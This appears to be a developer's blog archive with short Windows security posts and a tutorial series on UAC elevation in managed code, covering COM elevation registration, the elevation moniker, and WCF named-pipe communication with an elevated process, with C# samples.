
#  Wednesday, 19 November 2008

No, this time it is not Microsoft - it is NetGear that is not providing an x64-capable version of their software. The very latest VPN client software for a ProSafe router (FVS338) doesn't work (install) on Vista x64: 

I think it is needless to say that I am not amused. Who are you kidding in late 2008?

Categories: Security | this | x64
Wednesday, 19 November 2008 19:20:45 (W. Europe Standard Time, UTC+01:00)  #    Comments [1]

 



#  Thursday, 01 May 2008

A friend of mine lent me his copy of Crypto (by Steven Levy) last week, and today I got around to finishing it (I have been pretty busy lately, as you can tell from the close-to-zero new posts on this blog).

What's especially interesting about this book is the history, the background. In the past, I have read a couple of technical-level books and even attended the Crypto conference in Santa Barbara in 1997. What this book highlights are the connections between the acting persons (mathematicians may forgive me) as well as the whole shenanigans of trying to put the genie back in the bottle. I do remember some of those (PGP, low international key strengths, Clipper), but never read about them in such detail.

If you have some time to spare, definitely worth your time to understand how cryptography went public.

Categories: Books | Security
Thursday, 01 May 2008 16:18:27 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Friday, 08 February 2008

Yesterday, we found ourselves at the receiving end of an attack against one of our German Wikis that are running the ScrewTurn Wiki software. Turns out that it was a security issue even with the then latest version 2.0.23. Dario Solera - the maintainer of ScrewTurn - acted real fast when I informed him about the root cause of the attack and released v2.0.24 yesterday night.

Please download and upgrade immediately! The issue is being actively exploited (zero day if you so will).

Categories: ASP.NET | Security | this | Use the source Luke
Friday, 08 February 2008 07:54:08 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Friday, 02 November 2007

XSSDetect is a static code analysis tool that helps identify Cross-Site Scripting security flaws found within Web applications. It is able to scan compiled managed assemblies (C#, Visual Basic .NET, J#) and analyze dataflow paths from sources of user-controlled input to vulnerable outputs. It also detects whether proper encoding or filtering has been applied to the data and will ignore such "sanitized" paths. Download

Categories: .NET | ASP.NET | Security | Visual Studio
Friday, 02 November 2007 12:51:21 (W. Europe Standard Time, UTC+01:00)  #    Comments [1]

 



#  Monday, 15 October 2007

Been on holidays, at conferences (e.g. last week Ask The Experts @ XTOPIA in Berlin), and worked on various projects - a couple of reasons it was rather quiet lately in this blog.

Yesterday I decided I needed a simple guestbook application for a to-be-developed private Web site, and because I didn't find anything that fit my needs I decided to write one myself with the goal of (ab)using XLinq in the course of this endeavour:

Guestbook_XLINQ.zip (7.09 KB)

Caveat emptor: I am no designer (surprise!). But thanks to no design it should be easy for you to add your own design. However, as this month's MSDN magazine is all about security, I decided to make the application production-ready security-wise. You'll find a lot of parsing plus XSRF protection (note: this version does not check for integer overflow in calculating the start row).

Missing features: this guestbook is not prepared for localization, nor does it use a control-based approach (where you drop those in your pages and get an in-place guestbook).

Update: a version of this application for VS2008 RTM is available here.

Categories: 3.5 | ASP.NET | Security | Use the source Luke
Monday, 15 October 2007 09:56:36 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Friday, 10 August 2007
Version 2 of the IE7 Desktop Security Guide is available for download. If you are interested in locking down IE7, then you will need this document.
Categories: Administration | Security
Friday, 10 August 2007 09:55:34 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Monday, 06 August 2007

I set aside the entire day for reading the book Writing Secure Code for Windows Vista. And I was already able to put it back into the bookshelf thanks to its concise nature. The authors only tell the reader about "What's new and changed", without having people wade through tons of stuff they already know. I really greatly appreciate that the authors did not do a third edition of Writing Secure Code just for bringing developers up to speed on Vista security.

Hint to book publishers: other areas would also benefit from this approach. There is only so much time to read books, and I don't want to skim through information I already know. Please consider catering to non-noobs by offering more of these "What's new and changed" types of books to us old dogs.

PS: Way cool to be mentioned in a security book! (p27)

Categories: Books | Security
Monday, 06 August 2007 16:57:06 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Monday, 23 July 2007

I got myself an eval kit for RSA SecurID tokens to see how easy / hard this would be to deploy via AD. Well, I didn't get very far, that is, installation failed spectacularly in the early stages:

After this "helpful" message box setup decided to be more specific:

Ohh-Kay. Let's go to RSA and their support center (it takes roughly five clicks to get to online support, but that's another usability story) - sign in required. Hmmm. How about creating an account?

The eligibility is a real joke: "RSA customers who have a trial product (This does not include two user demos)". Excuse moi? On the Web site you told me that I was ordering a trial, and in actuality it turned out to be a "2-User Promo Kit" (the moment I needed support I looked more closely at the package...) without support.

Maybe it's the Microsoft Windows Server 2003 R2 Enterprise Edition VHD I am using?

Categories: Administration | Security | this
Monday, 23 July 2007 20:54:49 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Monday, 25 June 2007

A default install of Windows Server 2003 ships with a locked-down Internet Explorer, in a so-called enhanced security configuration. Getting rid of it was done by configuring the Windows components. Not so on Windows Server 2008. At first of course I looked in all the wrong places (after all, who reads a text they "know"?), until I found it in Server Manager:

You can turn it on / off separately for administrator or users:

Why did I turn it off? Because when it is on, you cannot view IIS7 FREB log files - the XSL has code in it that won't run in any browser but IE. At least at Beta 3 of Longhorn, that is.

Categories: IIS | Longhorn | Security
Monday, 25 June 2007 10:18:45 (W. Europe Daylight Time, UTC+02:00)  #    Comments [1]

 



#  Saturday, 02 June 2007

A couple of notes to self:

The latter is especially important if one fails to grasp how to turn the private key plus the certificate into the .pem for Stunnel. By the way, I was using CAcert. That works just fine for internal email servers.

Categories: Administration | Security | this
Saturday, 02 June 2007 17:22:41 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 28 February 2007

Fiddler is an HTTP debugging proxy. Although it is easy to use (a very good thing!), it is also very powerful. Case in point, and why I am writing about it today, is that I stumbled across a drive-by-download site (stumble is the wrong word, the URL came with what seemed like a phishing mail and that piqued my interest):

That site is actually quite clever though: when you go there the second time, it detects that it tried to infect you before and tells you that your IP is blocked. And it doesn't send a peep to a browser other than IE. Plus - and that takes the biscuit - it also verifies the referer.

But I still wanted the code, so I reset my router and started Fiddler:

Although Fiddler has tons more features, this did the trick for me in this case (if you want to learn what Fiddler can do, look here).

So what's the obfuscated script about? The short version: it is a variant of the ASUS download server drive-by download incident. The actual code can be found in a discussion on our German .NET community site here.

Categories: Cool Download | Security | this
Wednesday, 28 February 2007 15:26:38 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Wednesday, 21 February 2007

This is v2 of the Vista UAC development requirements document. From the TOC:

  • Why User Account Control?
  • How UAC Works
  • Will UAC Affect Your Application?
  • Designing Applications for Windows Vista
  • Deploying and Patching Applications for Standard Users
  • Troubleshooting Common Issues
  • References
Categories: Security | UAC | Vista
Wednesday, 21 February 2007 09:48:17 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Friday, 16 February 2007

In my last blog entry UAC Elevation in Managed Code: A .NET COM Component Elevated I showed how to get up and running with an all-managed code solution for UAC and COM elevation. Today I want to close out my series on UAC with some information on how to properly organize the project, plus present a library you can reuse to get up and running quickly - without many of the manual and tedious steps from the previous proof of concept example.

Speaking of the previous sample: it is still the basis for this best practice, so the following directory layout will look familiar to you:

Before diving into code, I want to start out with the SampleSetup directory, which contains the executables. As you can guess, the starting point is Step1Register. It contains register.bat, which you have to execute:

Note that on machines without the .NET Framework SDK, there is no gacutil.exe. In that case, you have to drag & drop ManagedElevator.dll to c:\windows\assembly.

And in case you have been wondering from this screenshot, yes, the application now also plays nicely on Windows XP:

Of course, there is no consent UI popping up, nor is there a shield icon like there is on Windows Vista:

The magic for this cross-platform functionality is hidden in the UACHelper project - which brings us to the source section of this blog post:

All the necessary COM elevation magic is now moved to this neat little library - including the adapted UAC bits of VistaBridgeLibrary (so referencing VistaBridgeLibrary is no longer necessary). The names already give away the purpose of each class and where they are used:

  • COMRegistration Used by the elevated component to automatically register the necessary registry keys.
  • ShieldButton Used by the client to display a button with a shield icon (on Vista). For XP, no shield is rendered.
  • COMElevation Starts the requested component with admin privileges.
  • ElevatedProcess If you want to start a simple process elevated. Not used in this guidance.

The first customer of this library is the elevated component, so we start discussing this guy next:

At first glance, this is similar to the previous POC implementation. The main difference now is that I have broken down the functionality by feature area into namespaces:

  • The "main" namespace
  • The .Components namespace
  • The .Guids namespace
  • The .InterOp namespace

Let's look at these one by one.

The "main" namespace

Here, we have one class only:

class RegisterFunctions
{
  [ComRegisterFunction]
  public static void CustomRegister(Type t)
  {
    COMRegistration.RegisterForElevation(Assembly.GetExecutingAssembly().Location,
       SampleComponent.ClassToElevate,
       Global.AppId,
       100);

    // add additional "for elevation" components here by duplicating the above
  }

  [ComUnregisterFunction]
  public static void CustomUnregister(Type t)
  {
    COMRegistration.UnRegisterFromElevation(Assembly.GetExecutingAssembly().Location,
        Global.AppId);
  }
}

It is called when the assembly is regasm'ed, and it is here where you call into COMRegistration.RegisterForElevation to add all the necessary registry keys for elevation:

public static void RegisterForElevation(string assemblyLocation,
    string classToElevate,
    string appId,
    int localizedStringId)
{
 if (!UACHelperFunctions.IsUACEnabledOS()) return;

 // [HKEY_CLASSES_ROOT\CLSID\{71E050A7-AF7F-42dd-BE00-BF955DDD13D4}]
 // "AppID"="{75AB90B0-8B9C-45c9-AC55-C53A9D718E1A}"
 // "LocalizedString"="@E:\\Daten\\Firma\\Konferenzen und Talks\\..."
 RegistryKey classKey = Registry.ClassesRoot.OpenSubKey(@"CLSID\{" + classToElevate + "}", true);
 classKey.SetValue("AppId", "{" + appId + "}", RegistryValueKind.String);
 classKey.SetValue("LocalizedString", "@" + assemblyLocation + ",-" + localizedStringId.ToString(), RegistryValueKind.String);

 // [HKEY_CLASSES_ROOT\CLSID\{71E050A7-AF7F-42dd-BE00-BF955DDD13D4}\Elevation]
 // "Enabled"=dword:00000001
 RegistryKey elevationKey = classKey.CreateSubKey("Elevation");
 elevationKey.SetValue("Enabled", 1, RegistryValueKind.DWord);
 elevationKey.Close();

 classKey.Close();

 // [HKEY_CLASSES_ROOT\AppID\{75AB90B0-8B9C-45c9-AC55-C53A9D718E1A}]
 // @="ManagedElevator"
 // "DllSurrogate"=""
 RegistryKey hkcrappId = Registry.ClassesRoot.OpenSubKey("AppID", true);
 RegistryKey appIdKey = hkcrappId.CreateSubKey("{" + appId + "}");
 appIdKey.SetValue(null, Path.GetFileNameWithoutExtension(assemblyLocation));
 appIdKey.SetValue("DllSurrogate", "", RegistryValueKind.String);
 appIdKey.Close();

 // [HKEY_CLASSES_ROOT\AppID\ManagedElevator.dll]
 // "AppID"="{75AB90B0-8B9C-45c9-AC55-C53A9D718E1A}"
 RegistryKey asmKey = hkcrappId.CreateSubKey(Path.GetFileName(assemblyLocation));
 asmKey.SetValue("AppID", "{" + appId + "}", RegistryValueKind.String);
 asmKey.Close();

 hkcrappId.Close();
}

Please take note that when the component is registered on eg Windows XP, no registry entries are written. After all, they are not needed.
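The four registry locations written above are easy to get subtly wrong (a missing DllSurrogate, a LocalizedString whose path moved). The following is an added example, not part of the UACHelper library, that reads the registration back and reports anything missing or inconsistent; the class and method names are my own, the default GUID is the sample's ClassToElevate from this post.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using Microsoft.Win32;

// Added example: verifies the registry entries RegisterForElevation writes.
// Run it after register.bat, e.g. as a small console application.
public static class ElevationRegistrationCheck
{
    // Returns the problems found for the given CLSID (without braces).
    // An empty list means the elevation registration is complete.
    public static List<string> Verify(string clsid)
    {
        List<string> problems = new List<string>();

        // 1. [HKCR\CLSID\{clsid}] must carry "AppID" and "LocalizedString"
        using (RegistryKey classKey = Registry.ClassesRoot.OpenSubKey(@"CLSID\{" + clsid + "}"))
        {
            if (classKey == null)
            {
                problems.Add("HKCR\\CLSID\\{" + clsid + "} is missing - was the assembly regasm'ed?");
                return problems;
            }

            string appId = classKey.GetValue("AppID") as string;
            if (string.IsNullOrEmpty(appId))
                problems.Add("CLSID key has no AppID value");

            // "@<path to dll>,-<resource id>": the text shown in the consent UI
            string assemblyPath = ParseLocalizedString(classKey.GetValue("LocalizedString") as string, problems);

            // 2. [HKCR\CLSID\{clsid}\Elevation] "Enabled"=dword:00000001
            using (RegistryKey elevationKey = classKey.OpenSubKey("Elevation"))
            {
                object enabled = elevationKey == null ? null : elevationKey.GetValue("Enabled");
                if (!(enabled is int) || (int)enabled != 1)
                    problems.Add("Elevation\\Enabled is not set to dword 1");
            }

            if (!string.IsNullOrEmpty(appId))
                VerifyAppId(appId, assemblyPath, problems);
        }
        return problems;
    }

    // Returns the DLL path embedded in LocalizedString, or null if it is unusable.
    private static string ParseLocalizedString(string localized, List<string> problems)
    {
        if (localized == null || !localized.StartsWith("@") || localized.LastIndexOf(",-") < 1)
        {
            problems.Add("LocalizedString missing or not of the form @<path>,-<id>");
            return null;
        }
        string path = localized.Substring(1, localized.LastIndexOf(",-") - 1);
        if (!File.Exists(path))
            problems.Add("LocalizedString points to a file that does not exist: " + path);
        // This file is loaded into an elevated surrogate process, so its directory
        // must not be writable by standard users (check the ACL separately).
        return path;
    }

    private static void VerifyAppId(string appId, string assemblyPath, List<string> problems)
    {
        // 3. [HKCR\AppID\{appId}] "DllSurrogate"="" (empty = the default dllhost.exe)
        using (RegistryKey appIdKey = Registry.ClassesRoot.OpenSubKey(@"AppID\" + appId))
        {
            if (appIdKey == null)
                problems.Add("HKCR\\AppID\\" + appId + " is missing");
            else if (appIdKey.GetValue("DllSurrogate") == null)
                problems.Add("AppID key has no DllSurrogate value - out-of-process activation will fail");
        }

        // 4. [HKCR\AppID\<dll file name>] "AppID" must point back to the same AppID
        if (assemblyPath == null) return;
        string fileName = Path.GetFileName(assemblyPath);
        using (RegistryKey asmKey = Registry.ClassesRoot.OpenSubKey(@"AppID\" + fileName))
        {
            string backRef = asmKey == null ? null : asmKey.GetValue("AppID") as string;
            if (!string.Equals(backRef, appId, StringComparison.OrdinalIgnoreCase))
                problems.Add("HKCR\\AppID\\" + fileName + " does not map back to " + appId);
        }
    }

    static void Main(string[] args)
    {
        // Defaults to the sample's ClassToElevate GUID from this post
        string clsid = args.Length > 0 ? args[0] : "71E050A7-AF7F-42dd-BE00-BF955DDD13D4";
        List<string> problems = Verify(clsid);
        Console.WriteLine(problems.Count == 0
            ? "Elevation registration for {" + clsid + "} is complete"
            : string.Join(Environment.NewLine, problems.ToArray()));
    }
}
```

On a non-UAC OS such as Windows XP the check reports the CLSID key without elevation entries, which is exactly what RegisterForElevation leaves behind there.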

The .Components namespace

Not much of a change - it contains the administrative component(s).

The .Guids namespace

The guids have been moved to a separate namespace. The reason? That way you can reference the assembly in the client project and use the guids directly - no magic strings anywhere any more.

The .InterOp namespace

This is the most important change with regards to the POC project - defining the correct ComImport'ed interface is now the responsibility of the implementer of the elevated component. That way, anyone needing access to this component only needs to reference the assembly and they are good to go. It is a bad idea to have this interface part of the client codebase!

Speaking of the client... here is the button code for DemoForm.cs:

private void cmdLaunch_Click(object sender, EventArgs e)
{
 if (UACHelperFunctions.IsUACEnabledOS())
 {
   IHelloWorld ihw = COMElevation.Start<IHelloWorld>(
        SampleComponent.ClassToElevate, SampleComponent.IHelloWorld);
   ihw.SayHello();
   COMElevation.Release(ihw);
 }
 else
 {
   ManagedElevator.Components.ClassToElevate c = new ManagedElevator.Components.ClassToElevate();
   c.SayHello();
 }
}

What looks interesting at first is COMElevation.Start as well as Release:

public class COMElevation
{
 public static TIFace Start<TIFace>(string IID_Class, string IID_Interface)
 {
  return Start<TIFace>(new Guid(IID_Class), new Guid(IID_Interface));
 }

 public static TIFace Start<TIFace>(Guid IID_Class, Guid IID_Interface)
 {
  object o = UACManager.LaunchElevatedCOMObject(IID_Class, IID_Interface);
  return (TIFace)o;
 }

 public static void Release(object o)
 {
  Marshal.ReleaseComObject(o);
 }
}

Actually all it does is encapsulate the necessary calls to UACManager and Marshal. Why is there no if / else using IsUACEnabledOS here? Well, at first I thought I'd build such a switch, but then I thought again: why would I use COM InterOp if I don't have to? I already referenced the assembly for the component (for the guids and interop interface), so why not use managed all the way and save time? That's what I did in the cmdLaunch_Click event handler.

That's it for the code folks, now a little discussion at the end on why in the world would you even think about doing this in a cross-platform way, or why it is a stupid idea all along:

This approach is only sensible if your application runs as administrative user on XP, otherwise all the calls in the administrative component will fail. However, the cross-platform part is only there to make it a complete best practice, there is no "you must use it cross-platform" - if you build applications for Windows Vista with the eventual need to elevate a task, then UACHelper is definitely for you! (and forget about that it would even work on XP)

Oh, and I almost forgot - here is the complete download, source code included of course (my code is BSD licensed):

AutomaticRegistration.zip (91.92 KB)

Categories: Security | UAC | Use the source Luke | Vista
Friday, 16 February 2007 08:02:29 (W. Europe Standard Time, UTC+01:00)  #    Comments [1]

 



#  Monday, 05 February 2007

I admit it: UAC Elevation in Managed Code: "Talking" to an Elevated Process via WCF is a kludge. The reason why I dabbled with this approach at all is that I failed to implement COM elevation with managed code (not the elevating of a COM component, but implementing the elevated COM component itself in managed code). However, at long last, I succeeded in that respect too: I now present you the all-managed code solution to UAC elevation!

Once again I built myself a small demo frontend application:

As you can guess, the first button does plain vanilla COM InterOp without any UAC elevation. Thus its code is rather simple:

private void simpleCallButton_Click(object sender, EventArgs e)
{
  Type t = Type.GetTypeFromCLSID(new Guid("71E050A7-AF7F-42dd-BE00-BF955DDD13D4"));
  object o = Activator.CreateInstance(t);
  t.InvokeMember("SayHello", BindingFlags.InvokeMethod, null, o, null);
}

Why this reflection magic? Well, the COM component I am calling here is implemented in .NET - and both VS as well as tlbimp balk at reimporting the exported type library.

The COM component in question has been regasm'ed & gacutil'ed (ManagedElevator project in the download). Although the name implies that I am after elevation, it is pretty much a standard COM component written using C#:

public class TheGuids
{
  public const string IHelloWorld = "B8CD5C09-9ACD-49b0-BF6F-C7B0F29795F9";
  public const string ClassToElevate = "71E050A7-AF7F-42dd-BE00-BF955DDD13D4";
  public const string AppId = "75AB90B0-8B9C-45c9-AC55-C53A9D718E1A";
}

[Guid(TheGuids.IHelloWorld)]
[InterfaceType(ComInterfaceType.InterfaceIsDual)]
public interface IHelloWorld
{
  [ComVisible(true)]
  void SayHello();
}

[Guid(TheGuids.ClassToElevate)]
[ClassInterface(ClassInterfaceType.None)]
public class ClassToElevate : IHelloWorld
{
 public ClassToElevate()
 {
 }

 [ComVisible(true)]
 public void SayHello()
 {
  MessageBox.Show("Hello World");
 }
}

So how do you go from "standard" "plain-vanilla" COM component to COM elevation? The part that stumped me for so long was the ClassInterface attribute - if you forget this guy, you'll end up with an InvalidCastException thrown by UACManager.LaunchElevatedCOMObject.

But that's not quite all to get up and running with COM elevation: in addition, you need to modify the default registration for this component - specifically, you need to configure the DllSurrogate. This is where the AppId GUID comes into play: it isn't used in code (kept there for documentation purposes only), but in registryadditions.reg. It binds the various registry keys. And speaking of this .reg file, please take note of the LocalizedString value: it contains the text for the UAC prompt (also check out UACPrompts.rc, resource.h, compilerc.bat as well as the properties of the ManagedElevator project where the compiled .res file is referenced).

Note: Before importing the .reg file into the registry make sure to fix the file path contained in LocalizedString! And if you create your own elevated COM component DO NOT reuse any of my three GUIDs - use guidgen.exe to create your personal ones.

From there, UAC elevation is smooth sailing. The Reflection version of COM elevation looks very similar to non-elevated calls:

private void managedElevation_Click(object sender, EventArgs e)
{
  // CLSID
  Guid classId = new Guid("71E050A7-AF7F-42dd-BE00-BF955DDD13D4");

  // Interface ID
  Guid interfaceId = new Guid("B8CD5C09-9ACD-49b0-BF6F-C7B0F29795F9");

  object o = UACManager.LaunchElevatedCOMObject(classId, interfaceId);

  Type t = o.GetType();
  t.InvokeMember("SayHello", BindingFlags.InvokeMethod, null, o, null);

  Marshal.ReleaseComObject(o);
}

Of course this is not really a good solution (late binding). So instead I manually imported the IHelloWorld interface:

[ComImport(),
 Guid("B8CD5C09-9ACD-49b0-BF6F-C7B0F29795F9"),
 InterfaceType(ComInterfaceType.InterfaceIsDual)]
interface IHelloWorld
{
  [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime),
   PreserveSig]
  void SayHello();
}

Which makes calls into the elevated COM object much easier and cleaner:

private void managedElevationInterface_Click(object sender, EventArgs e)
{
  Guid classId = new Guid("71E050A7-AF7F-42dd-BE00-BF955DDD13D4");
  Guid interfaceId = new Guid("B8CD5C09-9ACD-49b0-BF6F-C7B0F29795F9");

  object o = UACManager.LaunchElevatedCOMObject(classId, interfaceId);

  IHelloWorld ihw = (IHelloWorld)o;
  ihw.SayHello();

  Marshal.ReleaseComObject(o);
}

So why should you use the COM elevation solution instead of starting the process? Well, there are a couple of reasons:

  • You can package more than one component into a DLL and still have custom UAC prompts thanks to LocalizedString
  • Your users don't get "an unidentified program..." warnings. Thank you COM registration
  • If you ever need to talk more extensively with the elevated process then this approach can be adapted more easily

The source code

ConsumeMyElevatedCOM.zip (97.56 KB)

You will find a file aptly named notes.txt in the ManagedElevator project that describes all the necessary steps to get up and running.

I hope you find this sample useful and not have to spend as much time as I did. Cheers!

Categories: .NET | Security | UAC | Vista
Monday, 05 February 2007 22:41:46 (W. Europe Standard Time, UTC+01:00)  #    Comments [7]

 



#  Sunday, 04 February 2007

In the blog post UAC Elevation in Managed Code: Starting Elevated Processes I talked about how to start an elevated process. However, just starting a process might not cut the mustard, for example if you need to hand over data to the elevated process. You could achieve this by passing, let's say, some data as command line arguments to ProcessInfo before starting the elevated process. But that seriously limits communication.

So how can you perform communication with an elevated process? My first idea was to use .NET Remoting. Once I thought through the multi-instance scenario, I quickly realized that this meant the server had to be running in the non-elevated application, because only it could properly choose a port. And because I am not a fan of Remoting anyways, I decided to give WCF (Windows Communication Foundation, a pillar of .NET 3.0) a try.

It looked like smooth sailing at first, but then I realized that with WCF too I needed to implement the service inside the non-elevated application. This time, however, the reason was "How do I know when the elevated application has initialized before I can actually start communicating with it?". Back to the drawing board.

The final solution now looks like this: the non-elevated application starts a service. The operations contract specifies a callback, which, once the elevated application has signalled its readiness, can be used by the non-elevated application to "talk" with the elevated application. I didn't intend to go duplex, but hey, if there's no other way I am willing to take the plunge. Speaking of tricks of the trade: I am using imperative binding to a named pipe. Reason? Well, WS bindings won't work (see here and here), and the TCP channel would pop up a firewall warning. That's why.

Let's look at the applications - first the non-elevated one:

This time I forfeited eye candy (the shield button). Same (missing eye candy) goes for the elevated application as it is a console application only:

Solution-wise, this simple two-application scenario is split into four projects:

So where do we start? With the easy part inside ElevationContract:

[ServiceContract(Namespace = "http://Christoph.Wille.Samples",
CallbackContract = typeof(IElevatedProcess))]
public interface IWaitForElevatedProcess
{
  [OperationContract(IsOneWay = false)]
  void ElevatedProcessStarted();
}

[ServiceContract(Namespace = "http://Christoph.Wille.Samples")]
public interface IElevatedProcess
{
  [OperationContract(IsOneWay = false)]
  void SayHello(string message);
}

The interface IWaitForElevatedProcess is implemented in StandardUserApp. It is the service endpoint that is initialized before the elevated process is started - and once the elevated application is up and running, it calls into ElevatedProcessStarted. And we are in business for using the IElevatedProcess callback that is implemented in the ElevatedProcess console application.

So how is the service endpoint initialized? Let's take a look inside:

private const string theProcess = @"..\..\..\ElevatedProcess\bin\Debug\ElevatedProcess.exe";

private void tryitButton_Click(object sender, EventArgs e)
{
  string channelIdentifier = MiscHelpers.CreateRandomString(64);
  MyUACServiceHost.StartService(channelIdentifier);

  // starting it modal doesn't work (obviously - unless we have more threads, of course)
  ElevatedProcess.Start(theProcess, channelIdentifier);
}

Interesting tidbit #1 is CreateRandomString: it creates a random string to use for the address. Why? Well, if multiple instances of our application are running and trying to elevate a process, we are in trouble. Which brings me to StartService:
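The post does not show MiscHelpers.CreateRandomString itself, so here is an added example of such a helper with the same signature (my code, not the sample's). It draws from the cryptographic RNG, so a second instance cannot collide with or predict the address, and it only emits characters that need no escaping in the net.pipe://localhost/uac/<identifier> path segment.

```csharp
using System;
using System.Security.Cryptography;
using System.Text;

// Added example: an implementation of the random channel identifier helper.
public static class MiscHelpers
{
    // Letters and digits only: safe in a URI path segment and in a pipe name.
    private const string Alphabet =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";

    // 62 symbols; bytes 0..247 are accepted (248 = 4 * 62) so that "b % 62"
    // is uniform and no symbol is more likely than another.
    private const int MaxAcceptedByte = 248;

    public static string CreateRandomString(int length)
    {
        if (length <= 0)
            throw new ArgumentOutOfRangeException("length");

        StringBuilder sb = new StringBuilder(length);
        byte[] buffer = new byte[length * 2]; // over-provision; a few bytes are rejected
        using (RNGCryptoServiceProvider rng = new RNGCryptoServiceProvider())
        {
            while (sb.Length < length)
            {
                rng.GetBytes(buffer);
                foreach (byte b in buffer)
                {
                    if (b >= MaxAcceptedByte)
                        continue; // rejection sampling, see MaxAcceptedByte
                    sb.Append(Alphabet[b % Alphabet.Length]);
                    if (sb.Length == length)
                        break;
                }
            }
        }
        return sb.ToString();
    }

    static void Main()
    {
        // Same usage as in tryitButton_Click above: a 64-character identifier
        string channelIdentifier = CreateRandomString(64);
        Console.WriteLine("net.pipe://localhost/uac/" + channelIdentifier);
    }
}
```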

internal static void StartService(string pipeEndPoint)
{
  NetNamedPipeBinding binding = new NetNamedPipeBinding();
  binding.Name = "uacbinding";
  binding.Security.Mode = NetNamedPipeSecurityMode.Transport;

  Uri baseAddress = new Uri("net.pipe://localhost/uac/" + pipeEndPoint);

  myServiceHost = new ServiceHost(typeof(SampleService), baseAddress);
  myServiceHost.AddServiceEndpoint(typeof(IWaitForElevatedProcess), binding, baseAddress);
  myServiceHost.Open();
}

As I said before, I am doing it imperatively (no configuration in app.config necessary). That's all there is to getting the service up and running.

Now let's switch to the console application's Main method:

static void Main(string[] args)
{
  if (args.Length != 1)
  {
    Console.WriteLine("One argument expected - the channel identifier");
    return;
  }

  NetNamedPipeBinding binding = new NetNamedPipeBinding();
  binding.Name = "uacbinding";
  binding.Security.Mode = NetNamedPipeSecurityMode.Transport;

  String url = "net.pipe://localhost/uac/" + args[0];
  EndpointAddress address = new EndpointAddress(url);

  WaitForElevatedProcess client = new WaitForElevatedProcess(
      new InstanceContext(new SampleCallback()),
      binding,
      address);

  client.ElevatedProcessStarted();

  Console.WriteLine("The elevated process is now ready");
  Console.ReadLine();

  client.Close();
}

Similar to normal WCF client code, but with the duplex twist hidden inside WaitForElevatedProcess:

public class WaitForElevatedProcess : DuplexClientBase<IWaitForElevatedProcess>, IWaitForElevatedProcess
{
  public WaitForElevatedProcess(System.ServiceModel.InstanceContext callbackInstance,
    System.ServiceModel.Channels.Binding binding,
    System.ServiceModel.EndpointAddress remoteAddress)
       : base(callbackInstance, binding, remoteAddress)
  {
  }

  public void ElevatedProcessStarted()
  {
    base.Channel.ElevatedProcessStarted();
  }
}

Once the channel is connected, this elevated process calls back into the service piece which lives in the non-elevated application, namely SampleService:

[ServiceBehavior(ConcurrencyMode = ConcurrencyMode.Reentrant,
      InstanceContextMode = InstanceContextMode.PerSession)]
public class SampleService : IWaitForElevatedProcess
{
  public void ElevatedProcessStarted()
  {
    OperationContext.Current.GetCallbackChannel<IElevatedProcess>().SayHello("Chris");
  }
}

This method is the workhorse where I can talk to the elevated process - if only my callback interface had more, and more serious, methods ;-)

Speaking of talking, I owe you the code for the callee in the console application:

[CallbackBehavior(ConcurrencyMode = ConcurrencyMode.Reentrant)]
public class SampleCallback : IElevatedProcess
{
  public void SayHello(string message)
  {
    Console.WriteLine("Hello world " + message);
  }
}

That's it - to recap: first, we initialize the WCF service. Then we elevate a process. This process, once initialized, calls into our service and leaves a callback. And then we are in business talking to the elevated process (setting data, being notified when the elevated application quits and why, ...).

Sample caveats before you download: MyUACServiceHost definitely should be an instance rather than a static class. And, more restrictively: starting the elevated process modally won't allow any communication unless you start the service on a separate thread. For simplicity's sake I didn't do this for the POC.

ElevateProcessTalkWCF.zip (27 KB)

Before concluding I wanted to add a few words: my ideal implementation for UAC would be COM elevation. That way, one can put more than one component into a single DLL, and still get a meaningful UAC prompt thanks to the LocalizedString registry key - which is per component, and not per executable (which is the case for this solution if you add multiple actions). If you need differing prompts for each administrative action, there is only one course of action you can take with processes: create multiple executables. Not very pretty, but I failed with writing an elevatable (not a word, I am sure) managed (C#) COM component.

Categories: .NET | 3.0 | Security | UAC | Vista | WCF
Sunday, 04 February 2007 22:23:45 (W. Europe Standard Time, UTC+01:00)  #    Comments [3]

 



#  Tuesday, 30 January 2007

The previous installment UAC Elevation in Managed Code: Starting Elevated Processes dealt with starting executables with the "real" administrative token. In this blog post, we deal with starting a COM component with elevated privileges. For in-depth background information, please consult Kenny Kerr's absolutely excellent post on Windows Vista for Developers – Part 4 – User Account Control.

To start with, we need a COM component. Instead of writing an ATL C++ COM component from scratch, I took the MyElevateCom sample from CoCreateInstanceAsAdmin or CreateElevatedComObject sample from the Vista Compatibility Team Blog. For building it, check out my post Visual Studio on Vista: Not so Fast!

Assuming that you built and successfully registered the COM component (it is built according to the instructions from Kenny's post), you can go about writing the managed caller. First, we need a reference to the component:

Then comes the tricky part - actually instantiating the COM component. When you take a look at the C++ example, you see that quite some "moniker magic" is involved that cannot be replicated by simply newing up the component. So how to mimic this behavior in managed code? The Microsoft® Windows® Software Development Kit for Windows Vista™ and .NET Framework 3.0 Runtime Components comes to the rescue: inside, you find C:\Program Files\Microsoft SDKs\Windows\v6.0\Samples\CrossTechnologySamples.zip, which contains the VistaBridge sample.

From that, I took the VistaBridgeLibary, and modified the static UACManager.LaunchElevatedCOMObject method a bit:

[return: MarshalAs(UnmanagedType.Interface)]
public static object LaunchElevatedCOMObject(Guid Clsid, Guid InterfaceID)
{
  string CLSID = Clsid.ToString("B");
  string monikerName = "Elevation:Administrator!new:" + CLSID;

  NativeMethods.BIND_OPTS3 bo = new NativeMethods.BIND_OPTS3();
  bo.cbStruct = (uint)Marshal.SizeOf(bo);
  bo.hwnd = IntPtr.Zero;
  bo.dwClassContext = (int)NativeMethods.CLSCTX.CLSCTX_LOCAL_SERVER;

  object retVal = UnsafeNativeMethods.CoGetObject(monikerName, ref bo, InterfaceID);

  return (retVal);
}

